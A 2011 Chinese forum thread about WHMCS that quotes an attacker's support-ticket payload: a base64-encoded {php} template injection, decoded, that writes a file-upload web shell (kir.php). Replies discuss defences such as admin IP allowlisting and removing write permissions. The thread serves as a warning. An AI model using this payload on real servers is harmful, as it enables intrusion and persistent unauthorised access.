查看: 226|回复: 17

在whmcs后台的ticket中找到的一个服务单

[复制链接]

104

主题

772

回帖

1912

积分

金牌会员

积分
1912
发表于 2011-12-11 12:55:50 | 显示全部楼层 |阅读模式
入侵者先注册个id
提交一个ticket如下
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

base64解密后:

$code = ';
echo '';
if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!
'; }
        else { echo 'Upload GAGAL !!!
'; }
}
?>
$fo = fopen("kir.php","w");
fwrite($fo,$code);



建议大家先关闭ticket系统。。
回复

使用道具 举报

13

主题

593

回帖

1263

积分

金牌会员

积分
1263
发表于 2011-12-11 12:59:11 | 显示全部楼层
不是吧 太狠了
回复

使用道具 举报

551

主题

7515

回帖

1万

积分

论坛元老

积分
16739
发表于 2011-12-11 13:02:26 | 显示全部楼层
我也被入侵了 还好只是修改了管理员密码 其他的东西都没动

[ 本帖最后由 qiqibian 于 2011-12-11 13:03 编辑 ]
回复

使用道具 举报

422

主题

5224

回帖

1万

积分

论坛元老

积分
11868
发表于 2011-12-11 13:03:51 | 显示全部楼层


有什么用呢
回复

使用道具 举报

258

主题

1486

回帖

3880

积分

论坛元老

积分
3880
发表于 2011-12-11 13:04:47 | 显示全部楼层
牛逼啊 。 我也去搞去
回复

使用道具 举报

45

主题

2543

回帖

5239

积分

论坛元老

积分
5239
发表于 2011-12-11 13:05:30 | 显示全部楼层
不让注册不就行了
必须购买产品才能开通账号
可以实现么
回复

使用道具 举报

332

主题

4200

回帖

9504

积分

论坛元老

积分
9504
发表于 2011-12-11 13:09:20 | 显示全部楼层
哦又出洞洞了?
回复

使用道具 举报

298

主题

5200

回帖

1万

积分

论坛元老

积分
11370
发表于 2011-12-11 13:12:22 | 显示全部楼层
不要给写入权限,这方法就无效了
回复

使用道具 举报

712

主题

3220

回帖

8696

积分

论坛元老

积分
8696
发表于 2011-12-11 13:16:12 | 显示全部楼层
不是所有的都能入侵



这个提权?
回复

使用道具 举报

551

主题

7515

回帖

1万

积分

论坛元老

积分
16739
发表于 2011-12-11 13:17:57 | 显示全部楼层
最简单的方法直接吧admin目录设置白名单 只有家里的IP 手机的IP 和一个VPN的IP 可以登陆 物理隔绝
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关注公众号

相关侵权、举报、投诉及建议等,请发 E-mail:admin@discuz.vip

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖
关注公众号
返回顶部